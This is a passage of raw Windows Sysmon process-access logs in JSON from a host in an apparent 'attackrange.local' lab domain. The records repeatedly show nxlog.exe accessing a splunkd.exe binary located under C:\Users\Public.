(x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:49","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4269,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:49.480\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:49.480","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:50","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4270,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:50.481\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:50.481","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4271,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:51.481\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:51.481","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4272,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:52.482\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:52.482","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4273,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:53.483\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:53.483","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4274,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:54.484\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:54.484","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
